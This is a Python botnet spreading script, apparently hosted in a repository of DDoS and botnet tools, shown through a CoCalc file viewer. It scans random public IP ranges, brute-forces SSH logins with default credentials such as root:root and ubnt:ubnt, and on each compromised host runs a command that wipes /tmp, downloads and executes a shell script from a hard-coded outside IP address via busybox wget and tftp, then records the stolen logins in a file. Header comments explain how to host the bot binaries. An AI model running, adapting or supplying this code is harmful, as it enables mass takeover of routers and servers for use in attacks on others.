CoCalc -- Seb.py

GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/AUTOSCANNER/Seb.py
⁵⁰³⁸ views
1
#!/usr/bin/env python
2
#
3
#-Put the files in your htdocs directory of a server to host them named something sensible like kaiten-*, wildcard in place of the architecture name.
4
# Set some stuff on your servers so you don't get capped at 476 open SSH connections.
5
#-ulimit -n 99999
6
#-sysctl -w fs.file-max=100000
7
# Run heavyhidra
8
#-python infect.py 376 LUCKY x 0
9
#-python infect.py 376 B 113.53 1
10
 
11
 
12
import threading, paramiko, random, socket, time, sys
13
 
14
paramiko.util.log_to_file("/dev/null") #Prevents paramiko error spam.
15
 
16
files = [ #Files in which we would like to execute upon the routers.
17
    "gtop.sh",
18
 
19
 
20
]
21
 
22
website = "208.67.1.182" #Public facing IP hosting the IRC bot binaries.
23
 
24
reservedips = [ #Majestic list of reserved IP's we have no reason to scan. Actually quite dull.
25
 'http://127.',
26
 'http://0',
27
 'http://10.',
28
 'http://100.64',
29
 'http://100.65',
30
 'http://100.66',
31
 'http://100.67',
32
 'http://100.68',
33
 'http://100.69',
34
 'http://100.70',
35
 'http://100.71',
36
 'http://100.72',
37
 'http://100.73',
38
 'http://100.74',
39
 'http://100.75',
40
 'http://100.76',
41
 'http://100.77',
42
 'http://100.78',
43
 'http://100.79',
44
 'http://100.80',
45
 'http://100.81',
46
 'http://100.82',
47
 'http://100.83',
48
 'http://100.84',
49
 'http://100.85',
50
 'http://100.86',
51
 'http://100.87',
52
 'http://100.88',
53
 'http://100.89',
54
 'http://100.90',
55
 'http://100.91',
56
 'http://100.92',
57
 'http://100.93',
58
 'http://100.94',
59
 'http://100.95',
60
 'http://100.96',
61
 'http://100.97',
62
 'http://100.98',
63
 'http://100.99',
64
 'http://100.100',
65
 'http://100.101',
66
 'http://100.102',
67
 'http://100.103',
68
 'http://100.104',
69
 'http://100.105',
70
 'http://100.106',
71
 'http://100.107',
72
 'http://100.108',
73
 'http://100.109',
74
 'http://100.110',
75
 'http://100.111',
76
 'http://100.112',
77
 'http://100.113',
78
 'http://100.114',
79
 'http://100.115',
80
 'http://100.116',
81
 'http://100.117',
82
 'http://100.118',
83
 'http://100.119',
84
 'http://100.120',
85
 'http://100.121',
86
 'http://100.122',
87
 'http://100.123',
88
 'http://100.124',
89
 'http://100.125',
90
 'http://100.126',
91
 'http://100.127',
92
 'http://169.254',
93
 'http://172.16.',
94
 'http://172.17.',
95
 'http://172.18.',
96
 'http://172.19.',
97
 'http://172.20.',
98
 'http://172.21.',
99
 'http://172.22.',
100
 'http://172.23.',
101
 'http://172.24.',
102
 'http://172.25.',
103
 'http://172.26.',
104
 'http://172.27.',
105
 'http://172.28.',
106
 'http://172.29.',
107
 'http://172.30.',
108
 'http://172.32.',
109
 'http://192.0.0.0',
110
 'http://192.0.0.1',
111
 'http://192.0.0.2',
112
 'http://192.0.0.3',
113
 'http://192.0.0.4',
114
 'http://192.0.0.5',
115
 'http://192.0.0.6',
116
 'http://192.0.0.7',
117
 'http://192.0.2.',
118
 'http://192.88.99.',
119
 'http://192.168.',
120
 'http://198.18.',
121
 'http://198.19.',
122
 'http://198.51.100.',
123
 'http://203.0.113.',
124
 'http://224.',
125
 'http://225'
126
]
127
lucky = ["37.237","37.238","37.239","37.236","191.53","186.208","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97"]
128
passwords = [ #Some default SSH logins.
129
    "root:root",
130
    "root:admin",
131
    "admin:admin",
132
    "ubnt:ubnt",
133
    "root:password",
134
    "root:toor"
135
]
136
 
137
print sys.argv[0]+' Threads[max 376] A/B/C(ip class) /RAND IPHERE(1/1.1/1.1.1) 0/1 (password list, root:root) (doesn\'t scan recursively)' #Lack of basic system arguments/coded two years ago. Don't hate.
138
 
139
if sys.argv[4] == '1':
140
    passwords = [ "admin:1234", "root:root", "root:password", "root:12356", "admin:admin" ] #Faster exploitation with somewhat less results.
141

142
if sys.argv[4] == 'K':
143
    passwords = [ "root:test", "root:root" ]
144

145
ipclassinfo = sys.argv[2]
146
if ipclassinfo == "A":
147
    ip1 = sys.argv[3]
148
elif ipclassinfo == "B":
149
    ip1 = sys.argv[3].split(".")[0]
150
    ip2 = sys.argv[3].split(".")[1]
151
elif ipclassinfo == "C":
152
    ips = sys.argv[3].split(".")
153
    num=0
154
    for ip in ips:
155
        num=num+1
156
        if num == 1:
157
            ip1 = ip
158
        elif num == 2:
159
            ip2 = ip
160
        elif num == 3:
161
            ip3 = ip
162
class sshscanner(threading.Thread):
163
    global passwords
164
    global ipclassinfo
165
    if ipclassinfo == "A":
166
        global ip1
167
    elif ipclassinfo == "B":
168
        global ip1
169
        global ip2
170
    elif ipclassinfo == "C":
171
        global ip1
172
        global ip2
173
        global ip3
174
    def run(self):
175
        while 1:
176
            try:
177
                while 1:
178
                    thisipisbad='no'
179
                    if ipclassinfo == "A":
180
                        self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
181
                    elif ipclassinfo == "B":
182
                        self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
183
                    elif ipclassinfo == "C":
184
                        self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
185
                    elif ipclassinfo == "LUCKY":
186
                        self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
187
                    else:
188
                        self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
189
                    for badip in reservedips:
190
                        if badip in self.host:
191
                            thisipisbad='yes'
192
                    if thisipisbad=='no':
193
                        break
194
                self.host=self.host.replace('http://', '') #This could be optimized. This is bad code. No idea why I did it like this.
195
                username='root'
196
                password="0"
197
                port = 22
198
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
199
                s.settimeout(3)
200
                s.connect((self.host, port))
201
                s.close()
202
                ssh = paramiko.SSHClient()
203
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
204
                dobreak=False
205
                for passwd in passwords:
206
                    if ":n/a" in passwd:
207
                        password=""
208
                    else:
209
                        password=passwd.split(":")[1]
210
                    if "n/a:" in passwd:
211
                        username=""
212
                    else:
213
                        username=passwd.split(":")[0]
214
                    try:
215
                        ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
216
                        dobreak=True
217
                        break
218
                    except:
219
                        pass
220
                    if True == dobreak:
221
                        break
222
                badserver=True
223
                stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
224
                output = stdout.read()
225
                if "inet addr" in output:
226
                    badserver=False
227
                websites = [ ]         
228
                if badserver == False:
229
                        print '\x1b[31mInfected:'+username+'<'+password+'>'+self.host+'|'+str(port)
230
                        ssh.exec_command("cd /tmp; rm -rf *;busybox wget -q http://208.67.1.182/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *; busybox tftp -r tftp.sh -g ; sh tftp.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh\r\n")
231
			infectedip = open("rooted.txt","a").write(username+":"+password+":"+self.host+"\n")
232
                        time.sleep(30)
233
			ssh.close()
234
            except:
235
                pass
236
 
237
for x in range(0,int(sys.argv[1])): #This may abuse your system resources and anger network administrators.
238
    try:
239
        t = sshscanner()
240
        t.start()
241
    except:
242
        pass
243
Product

Resources

Company
